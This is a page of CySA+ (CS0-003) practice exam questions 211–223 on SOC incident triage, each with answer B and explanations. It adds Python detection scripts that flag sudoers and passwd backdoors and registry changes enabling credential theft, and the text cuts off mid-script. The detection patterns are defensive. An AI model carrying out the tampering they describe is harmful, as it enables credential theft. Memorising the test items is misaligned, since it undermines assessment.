CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 15 Q211-225
Question 211
A SOC analyst observes Windows endpoints executing scripts that attempt to disable BitLocker encryption and modify group policies controlling disk access during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine system configuration; allow activity.
B) Malware attempting persistence, privilege escalation, and data exposure; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured BitLocker policies; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes a routine system configuration. Legitimate system configuration changes are scheduled, documented, and performed using approved tools. Disabling BitLocker encryption and modifying group policies controlling disk access via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to access sensitive information, persist, escalate privileges, and potentially compromise the integrity and confidentiality of data stored on endpoints. Routine system configurations are predictable, auditable, and follow change management procedures, unlike unauthorized scripts executed during off-hours.
Option B is correct. Malware frequently targets encryption mechanisms and group policies to escalate privileges, maintain persistence, and potentially exfiltrate sensitive data. Indicators include off-hours activity, elevated privileges, execution by unsigned scripts, and unauthorized modifications to critical system configurations like BitLocker and Group Policy Objects. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine the behavior and objectives of the malware. Remediation includes restoring BitLocker policies, re-encrypting affected volumes, reverting group policy modifications, cleaning endpoints, updating monitoring rules, and auditing similar systems for comparable activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence by providing insights into attack techniques, tactics, and procedures. Ignoring this activity allows malware to persist undetected, escalate privileges, expose sensitive data, and potentially move laterally across the network.
Option C assumes misconfigured BitLocker policies. Misconfigurations typically cause predictable errors, prevent disk access for specific users, or generate alerts within security monitoring systems, and they do not explain off-hours execution of unsigned scripts to disable encryption and modify group policies. Treating this as benign risks persistent malware activity, unauthorized access, and potential data breaches.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts disabling encryption and modifying group policies are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, data exposure, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, data confidentiality, system integrity, and regulatory compliance. It also prevents further lateral movement and potential exfiltration of sensitive information.
Question 212
A SOC analyst detects Linux endpoints executing scripts that attempt to modify PAM (Pluggable Authentication Module) configurations and create unauthorized sudo entries during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine authentication configuration; allow activity.
B) Malware attempting privilege escalation and persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured PAM policies; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes a routine authentication configuration. Legitimate changes to authentication modules are scheduled, documented, and follow strict change management procedures. Modifying PAM configurations and creating unauthorized sudo entries via undocumented scripts during off-hours indicates anomalous behavior. Allowing this could enable malware to escalate privileges, persist undetected, and compromise system security and sensitive resources. Routine authentication modifications are auditable, predictable, and require authorization, unlike unauthorized off-hours activity.
Option B is correct. Malware often targets authentication mechanisms, including PAM configurations, to escalate privileges and maintain persistence. Indicators include off-hours activity, elevated privileges, execution by undocumented scripts, and unauthorized modifications to authentication modules. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior, including the creation of hidden user accounts or backdoor access. Remediation includes restoring PAM configurations from trusted backups, removing unauthorized sudo entries, cleaning endpoints, updating monitoring rules to detect anomalous authentication modifications, and auditing similar systems for comparable changes. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, escalate privileges, maintain hidden access, and potentially compromise sensitive data.
Option C assumes misconfigured PAM policies. Misconfigurations typically produce predictable errors, failed authentications, or logs of policy violations, and they do not explain off-hours undocumented script execution that creates unauthorized sudo entries. Treating this as benign risks persistent malware activity, privilege escalation, and unauthorized access.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying authentication modules and creating unauthorized sudo entries are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, authentication integrity, and regulatory compliance. It also prevents potential lateral movement and unauthorized access to critical resources.
Question 213
A SOC analyst observes Windows endpoints executing scripts that attempt to exfiltrate encrypted database backups and SQL Server configuration files to external servers during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine backup; allow activity.
B) Malware performing data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured database backup policies; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine backups. Legitimate backups are scheduled, documented, and use approved tools targeting authorized destinations. Exfiltration of encrypted database backups and SQL Server configuration files off-hours via unsigned scripts indicates anomalous activity. Allowing this could enable malware to access critical information, escalate privileges, and persist undetected. Routine backups are predictable, auditable, and typically involve authorized storage locations, unlike off-hours activity targeting unknown external servers.
Option B is correct. Malware frequently targets database backups and configuration files to gain unauthorized access to sensitive information, create backdoors, or facilitate lateral movement. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and attempts to transfer data to unknown external destinations. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine what data may have been compromised. Remediation includes cleaning endpoints, blocking malicious IP addresses, resetting compromised credentials, updating monitoring rules for unauthorized data exports, and auditing backup policies and storage locations. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows persistent malware to compromise sensitive data, enable unauthorized access, and create a potential point of failure for database security.
Option C assumes misconfigured database backup policies. Misconfigurations usually cause predictable failures or alerts, but do not explain off-hours execution of unsigned scripts transferring critical data externally. Treating this as benign risks persistent malware activity, unauthorized access, and data exfiltration.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts exfiltrating database files are inconsistent with legitimate testing. Misclassification risks persistent malware activity, data exfiltration, and regulatory violations.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining database integrity, data confidentiality, and endpoint security. It also mitigates the risk of future attacks leveraging stolen backups or credentials.
Question 214
A SOC analyst detects Linux endpoints executing scripts attempting to modify system logging configurations and disable audit mechanisms during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine system maintenance; allow activity.
B) Malware attempting persistence and evasion; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured logging policies; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes routine system maintenance. Legitimate maintenance activities are scheduled, documented, and performed using approved tools. Modifying logging configurations and disabling audit mechanisms via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist undetected, evade monitoring, and compromise system security and sensitive resources. Routine maintenance is auditable and predictable, unlike unauthorized off-hours activity.
Option B is correct. Malware frequently targets logging and auditing mechanisms to evade detection and maintain persistence. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized modifications to system audit configurations. Immediate SOC response involves isolating affected endpoints to prevent further evasion, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and potential impacts. Remediation includes restoring logging configurations, re-enabling audit mechanisms, cleaning endpoints, updating monitoring rules to detect unauthorized changes, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, remain undetected, manipulate logs, and compromise sensitive systems.
Option C assumes misconfigured logging policies. Misconfigurations generally produce predictable errors, failed logs, or alerts, and do not explain off-hours undocumented script execution. Treating this as benign risks persistent malware activity, evasion, and endpoint compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying logging configurations are inconsistent with legitimate testing. Misclassification risks persistent malware activity, audit evasion, and system compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance. It also prevents further undetected malicious activity across the network.
Question 215
A SOC analyst observes Windows endpoints executing scripts attempting to create unauthorized administrative accounts and modify Active Directory permissions during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine administrative changes; allow activity.
B) Malware attempting privilege escalation and persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured Active Directory permissions; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative changes. Legitimate administrative modifications are scheduled, documented, and performed using approved tools. Creating unauthorized admin accounts and modifying Active Directory permissions via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to escalate privileges, persist, and compromise domain-level resources. Routine administrative changes are predictable, auditable, and follow strict change management procedures, unlike unauthorized off-hours activity.
Option B is correct. Malware often creates unauthorized administrative accounts and modifies directory permissions to escalate privileges, maintain persistence, and control domain resources. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized Active Directory modifications. Immediate SOC response involves isolating affected endpoints, capturing memory and logs for forensic analysis, and analyzing scripts to identify malware behavior and the scope of compromise. Remediation includes removing unauthorized accounts, restoring directory permissions, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows persistent malware to escalate privileges, maintain undetected access, and compromise sensitive directory services.
Option C assumes misconfigured Active Directory permissions. Misconfigurations generally produce predictable errors or limited access issues and do not explain off-hours, unsigned scripts modifying permissions. Treating this as benign risks persistent malware activity, privilege escalation, and domain compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts creating admin accounts are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and domain compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining Active Directory security, endpoint integrity, and regulatory compliance. It also prevents potential lateral movement and compromise of critical systems.
Question 216
A SOC analyst detects Linux endpoints executing scripts attempting to modify firewall rules and open unusual ports during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine network configuration; allow activity.
B) Malware attempting persistence and lateral movement; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured firewall rules; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes a routine network configuration. Legitimate network changes are scheduled, documented, and use approved tools. Modifying firewall rules and opening unusual ports via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to move laterally, evade detection, and persist undetected. Routine network changes are auditable, predictable, and follow strict change management procedures, unlike unauthorized off-hours scripts.
Option B is correct. Malware frequently modifies firewall rules to allow external access, exfiltrate data, or facilitate lateral movement within a network. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unusual port activity. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior. Remediation includes restoring firewall rules from trusted configurations, closing unauthorized ports, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, evade detection, expand its foothold, and potentially compromise sensitive data or critical systems.
Option C assumes misconfigured firewall rules. Misconfigurations typically produce predictable access issues or alerts, and do not explain off-hours undocumented script execution opening unusual ports. Treating this as benign risks persistent malware activity, lateral movement, and data compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts modifying firewall rules are inconsistent with legitimate testing. Misclassification risks persistent malware activity, evasion, lateral movement, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, network integrity, and regulatory compliance.
Question 217
A SOC analyst observes Windows endpoints executing scripts attempting to disable Windows Event Logging and clear security logs during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine system maintenance; allow activity.
B) Malware attempting persistence and evasion; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured logging policies; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine system maintenance. Legitimate maintenance activities are scheduled, documented, and performed using approved tools. Disabling Windows Event Logging and clearing security logs via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to evade detection, persist undetected, and compromise system integrity and security monitoring. Routine maintenance is predictable, auditable, and follows strict change management procedures, unlike off-hours unauthorized script execution.
Option B is correct. Malware frequently targets security logs to avoid detection and maintain persistence. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized modifications to logging configurations. Immediate SOC response involves isolating affected endpoints to prevent further evasion, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and the scope of compromised logs. Remediation includes restoring logging configurations, cleaning endpoints, updating monitoring rules to detect unauthorized log modifications, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, evade detection, manipulate logs, and compromise system security.
Option C assumes misconfigured logging policies. Misconfigurations typically produce predictable failures or error alerts, or prevent certain events from being logged, and they do not explain off-hours undocumented script execution clearing logs. Treating this as benign risks persistent malware activity, evasion, and endpoint compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts clearing security logs are inconsistent with legitimate testing. Misclassification risks persistent malware activity, evasion, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, monitoring integrity, and regulatory compliance.
Question 218
A SOC analyst detects Linux endpoints executing scripts attempting to exfiltrate system credentials, SSH keys, and configuration files to external servers during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine file backup; allow activity.
B) Malware performing credential theft and data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured backup policies; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes routine file backup. Legitimate backups are scheduled, documented, and use approved tools and destinations. Exfiltration of system credentials, SSH keys, and configuration files off-hours via undocumented scripts indicates anomalous activity. Allowing this could enable malware to compromise credentials, escalate privileges, persist undetected, and exfiltrate sensitive data. Routine backups are predictable, auditable, and involve authorized storage locations, unlike unauthorized off-hours activity.
Option B is correct. Malware frequently targets credentials and configuration files to gain unauthorized access, escalate privileges, and maintain persistence. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and attempts to communicate with external servers. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine what data has been accessed or exfiltrated. Remediation includes cleaning endpoints, resetting compromised credentials, blocking malicious IP addresses, updating monitoring rules, and auditing sensitive directories. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, compromise authentication mechanisms, exfiltrate sensitive data, and move laterally across the network.
Option C assumes misconfigured backup policies. Misconfigurations typically cause predictable failures or alerts and do not explain off-hours unauthorized exfiltration of credentials. Treating this as benign risks persistent malware activity, unauthorized access, and data loss.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts exporting credentials and configuration files are inconsistent with legitimate testing. Misclassification risks persistent malware activity, credential theft, and regulatory violations.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, credential integrity, and data confidentiality.
Question 219
A SOC analyst observes Windows endpoints executing scripts attempting to modify registry autorun keys, disable antivirus software, and create scheduled tasks during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine administrative changes; allow activity.
B) Malware attempting persistence and evasion; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured system policies; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative changes. Legitimate administrative modifications are scheduled, documented, and performed using approved tools. Modifying registry autorun keys, disabling antivirus software, and creating scheduled tasks via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist, evade detection, and compromise endpoints. Routine administrative changes are predictable, auditable, and follow change management procedures, unlike unauthorized scripts.
Option B is correct. Malware frequently modifies autorun keys, disables antivirus software, and creates scheduled tasks to maintain persistence and evade detection. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized modifications to critical system configurations. Immediate SOC response involves isolating affected endpoints, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and intended modifications. Remediation includes restoring antivirus and autorun configurations, removing unauthorized scheduled tasks, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, evade detection, escalate privileges, and compromise endpoint security.
Option C assumes misconfigured system policies. Misconfigurations generally produce predictable errors or alerts and do not explain off-hours execution of unsigned scripts performing multiple malicious activities. Treating this as benign risks persistent malware activity, evasion, and endpoint compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying the registry and disabling security software are inconsistent with legitimate testing. Misclassification risks persistent malware activity, evasion, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance.
Question 220
A SOC analyst detects Linux endpoints executing scripts attempting to install keyloggers, capture SSH credentials, and modify cron jobs for persistence during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine system updates; allow activity.
B) Malware attempting persistence, credential theft, and privilege escalation; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured cron jobs; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes routine system updates. Legitimate updates are scheduled, documented, and use verified packages. Installing keyloggers, capturing SSH credentials, and modifying cron jobs via undocumented scripts during off-hours indicates anomalous activity. Allowing this could enable malware to persist, capture sensitive information, escalate privileges, and compromise endpoints. Routine updates are predictable, auditable, and follow change management procedures, unlike unauthorized off-hours activity.
Option B is correct. Malware frequently installs keyloggers, captures credentials, and modifies cron jobs to maintain persistence, escalate privileges, and collect sensitive data. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized modifications to system configurations and scheduled tasks. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and the scope of compromise. Remediation includes removing keyloggers, restoring cron jobs, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, steal credentials, escalate privileges, and compromise sensitive systems.
Option C assumes misconfigured cron jobs. Misconfigurations typically produce predictable errors or missed job execution and do not explain off-hours undocumented scripts installing keyloggers or capturing credentials. Treating this as benign risks persistent malware activity, credential theft, and endpoint compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts installing keyloggers are inconsistent with legitimate testing. Misclassification risks persistent malware activity, credential theft, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, data confidentiality, and system integrity.
Question 221
A SOC analyst observes Windows endpoints executing scripts attempting to exfiltrate corporate financial spreadsheets and ERP configuration files to unknown external servers during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine financial backups; allow activity.
B) Malware performing data exfiltration; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured ERP backup policies; update configuration.
D) User testing; notify the finance team.
Answer: B)
Explanation:
Option A assumes routine financial backups. Legitimate financial backups are scheduled, documented, and executed using approved tools, targeting authorized storage locations. Exfiltration of spreadsheets and ERP configuration files off-hours via unsigned scripts indicates anomalous activity. Allowing this could enable malware to access sensitive financial data, persist undetected, escalate privileges, and potentially compromise enterprise operations. Routine backups are predictable, auditable, and performed under strict compliance policies, unlike unauthorized off-hours scripts targeting unknown external servers.
Option B is correct. Malware frequently targets financial information and ERP configurations to steal sensitive corporate data for financial gain or espionage. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and attempts to communicate with unknown external servers. Immediate SOC response involves isolating affected endpoints to prevent further exfiltration, capturing network traffic for forensic analysis, and analyzing scripts to determine the scope of compromised data. Remediation includes cleaning endpoints, blocking malicious external destinations, resetting credentials, updating monitoring rules for data exfiltration, and auditing ERP systems for signs of compromise. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence by identifying tactics, techniques, and procedures used by attackers. Ignoring this activity allows malware to persist, compromise sensitive financial data, facilitate fraud or espionage, and potentially evade detection across multiple systems.
Option C assumes misconfigured ERP backup policies. Misconfigurations usually cause predictable errors or failed backup alerts, but they do not explain off-hours execution of unsigned scripts exporting sensitive files to unknown destinations. Treating this as benign risks persistent malware activity, unauthorized access, and financial data loss.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours unauthorized script execution, exporting financial data, is inconsistent with legitimate testing. Misclassification risks persistent malware activity, data exfiltration, regulatory violations, and financial exposure.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, financial data confidentiality, and regulatory compliance.
Question 222
A SOC analyst detects Linux endpoints executing scripts attempting to modify sudoers files, create hidden administrative accounts, and escalate privileges during off-hours. The scripts are undocumented and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine administrative updates; allow activity.
B) Malware attempting privilege escalation and persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured sudo policies; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes routine administrative updates. Legitimate administrative changes are scheduled, documented, and performed using approved tools. Modifying sudoers files, creating hidden accounts, and escalating privileges via undocumented scripts during off-hours indicates anomalous behavior. Allowing this could enable malware to persist undetected, gain unauthorized root-level access, and compromise sensitive systems. Routine administrative updates are predictable, auditable, and follow change management procedures, unlike unauthorized off-hours scripts.
Option B is correct. Malware frequently targets sudoers files and account creation mechanisms to escalate privileges and maintain persistent access. Indicators include off-hours execution, elevated privileges, execution by undocumented scripts, and unauthorized changes to critical administrative configurations. Immediate SOC response involves isolating affected endpoints to prevent further compromise, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior. Remediation includes restoring sudoers files from trusted backups, removing hidden administrative accounts, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, escalate privileges, maintain root-level access, and potentially compromise sensitive systems or data.
Option C assumes misconfigured sudo policies. Misconfigurations typically produce predictable errors or failed commands and do not explain off-hours execution of undocumented scripts that create hidden accounts. Treating this as benign risks persistent malware activity, privilege escalation, and system compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours undocumented scripts modifying sudoers files and creating hidden accounts are inconsistent with legitimate testing. Misclassification risks persistent malware activity, privilege escalation, and endpoint compromise.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, system integrity, and regulatory compliance.
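The following Python triage script is an added worked example for this question and is not part of the original explanation or of any vendor tool. It shows the check an analyst runs on an isolated Linux endpoint (or on files pulled from it) to confirm the sudoers and account tampering described above: it diffs the effective sudoers lines against an approved baseline, flags NOPASSWD-for-ALL grants, and scans /etc/passwd for a second UID 0 account, dot-prefixed account names, and home directories under volatile or hidden paths. The sample sudoers and passwd contents and the baseline set are constructed for the example; on a real host you would also feed it the files under /etc/sudoers.d.

```python
import re

# Constructed sample inputs, not taken from the page: a sudoers file and an
# /etc/passwd as they might look after the scripted tampering in Question 222.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
svc_backup ALL=(ALL) NOPASSWD: ALL
@includedir /etc/sudoers.d
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc_backup:x:0:0::/var/tmp/.cache:/bin/bash
.sysd:x:1001:1001::/dev/shm/.x:/bin/sh
"""

# Hypothetical approved baseline, e.g. exported from configuration management.
BASELINE_SUDOERS = {
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "%sudo ALL=(ALL:ALL) ALL",
    "@includedir /etc/sudoers.d",
}

CRITICAL_TAGS = {"nopasswd-all", "uid0-non-root"}


def sudoers_findings(text, baseline):
    """Return (tag, line) for every effective sudoers line not in the baseline."""
    findings = []
    for raw in text.splitlines():
        line = " ".join(raw.split())          # normalise whitespace before comparing
        if not line or (line.startswith("#") and not line.startswith("#include")):
            continue                          # comment; '#include' is a directive in older sudo
        if line in baseline:
            continue
        tag = "new-sudoers-entry"
        if "NOPASSWD" in line and re.search(r"\bALL\s*$", line):
            tag = "nopasswd-all"              # passwordless root for any command
        findings.append((tag, line))
    return findings


def passwd_findings(text):
    """Return (tag, account) for accounts that look like planted backdoors."""
    findings = []
    for raw in text.splitlines():
        fields = raw.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, _gid, _gecos, home, _shell = fields
        if uid == "0" and name != "root":
            findings.append(("uid0-non-root", name))    # a second root-equivalent account
        if name.startswith("."):
            findings.append(("hidden-name", name))       # hides from casual listings
        if home.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) or "/." in home:
            findings.append(("suspicious-home", name))   # volatile or dot-directory home
    return findings


def verdict(sudoers_text, passwd_text, baseline=BASELINE_SUDOERS):
    """Collapse the findings into the triage decision the SOC has to make."""
    tags = {t for t, _ in sudoers_findings(sudoers_text, baseline)}
    tags |= {t for t, _ in passwd_findings(passwd_text)}
    if tags & CRITICAL_TAGS:
        return "isolate-and-capture"   # contain first, then memory and log capture
    return "review" if tags else "clean"


if __name__ == "__main__":
    for finding in sudoers_findings(SAMPLE_SUDOERS, BASELINE_SUDOERS) + passwd_findings(SAMPLE_PASSWD):
        print(*finding)
    print("verdict:", verdict(SAMPLE_SUDOERS, SAMPLE_PASSWD))
```

The verdict deliberately escalates on a single NOPASSWD-for-ALL grant or extra UID 0 account: either one already gives an attacker root, so the answer is containment and evidence capture, not "update configuration" as option C suggests.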
Question 223
A SOC analyst observes Windows endpoints executing scripts attempting to disable credential caching, modify Kerberos policies, and exfiltrate authentication tokens during off-hours. The scripts are unsigned and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine system optimization; allow activity.
B) Malware performing credential theft and privilege escalation; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured Kerberos policies; update configuration.
D) User testing; notify IT.
Answer: B)
Explanation:
Option A assumes routine system optimization. Legitimate optimizations are scheduled, documented, and performed using approved tools. Disabling credential caching, modifying Kerberos policies, and exfiltrating authentication tokens via unsigned scripts during off-hours indicates anomalous activity. Allowing this could enable malware to steal credentials, escalate privileges, and persist undetected across domain environments. Routine optimizations are predictable, auditable, and follow strict change management procedures, unlike unauthorized scripts.
Option B is correct. Malware frequently targets authentication mechanisms to gain unauthorized access, exfiltrate credentials, and escalate privileges. Indicators include off-hours execution, elevated privileges, execution by unsigned scripts, and unauthorized modifications to Kerberos or credential storage configurations. Immediate SOC response involves isolating affected endpoints to prevent further credential theft, capturing memory and logs for forensic analysis, and analyzing scripts to determine malware behavior and scope of compromise. Remediation includes restoring Kerberos policies, resetting compromised credentials, cleaning endpoints, updating monitoring rules, and auditing similar systems. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and strengthens threat intelligence. Ignoring this activity allows malware to persist, steal authentication tokens, escalate privileges, and compromise sensitive domain resources.
Option C assumes misconfigured Kerberos policies. Misconfigurations generally produce predictable authentication errors and do not explain off-hours execution of unsigned scripts that exfiltrate credentials. Treating this as benign risks persistent malware activity, credential theft, and domain compromise.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours unsigned scripts exfiltrating authentication tokens are inconsistent with legitimate testing. Misclassification risks persistent malware activity, credential theft, and regulatory violations.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security, authentication integrity, and regulatory compliance.
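As an added worked example for this question (not from the original explanation or from any product), the Python below scores Sysmon Event ID 13 (registry value set) records against a watchlist of the values that govern credential caching, credential protection, and Kerberos parameters. Any change to those values by a scripting host such as powershell.exe or reg.exe, especially outside business hours, is the signal to isolate the endpoint and capture memory, because the point of tampering with them is to make credentials easier to steal. The event records, the site time-zone offset, and the business-hours window are constructed assumptions; note also that Sysmon only emits Event 13 for targets covered by its configuration, so the watched keys must be in the Sysmon rule set for this to fire at all.

```python
from datetime import datetime, timedelta

# Registry values that control credential caching, credential protection and
# Kerberos behaviour; a scripted write to any of them is the kind of change
# Question 223 describes. Paths are in the form Sysmon reports them.
WATCHLIST = {
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount": "cached logon count",
    r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential": "WDigest plaintext credentials",
    r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL": "LSA protection",
    r"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos\Parameters\SupportedEncryptionTypes": "Kerberos encryption types",
}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "reg.exe"}
SITE_UTC_OFFSET = -5   # assumption: the site's local time zone, for the off-hours check

# Constructed records shaped like Sysmon Event ID 13 (RegistryEvent, value set);
# not real telemetry. A real pipeline reads these from EVTX/XML.
EVENTS = [
    {"EventID": 13, "UtcTime": "2024-03-12 02:17:44.101", "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\CachedLogonsCount",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13, "UtcTime": "2024-03-12 02:17:45.310", "User": r"NT AUTHORITY\SYSTEM",
     "Image": r"C:\Windows\System32\reg.exe",
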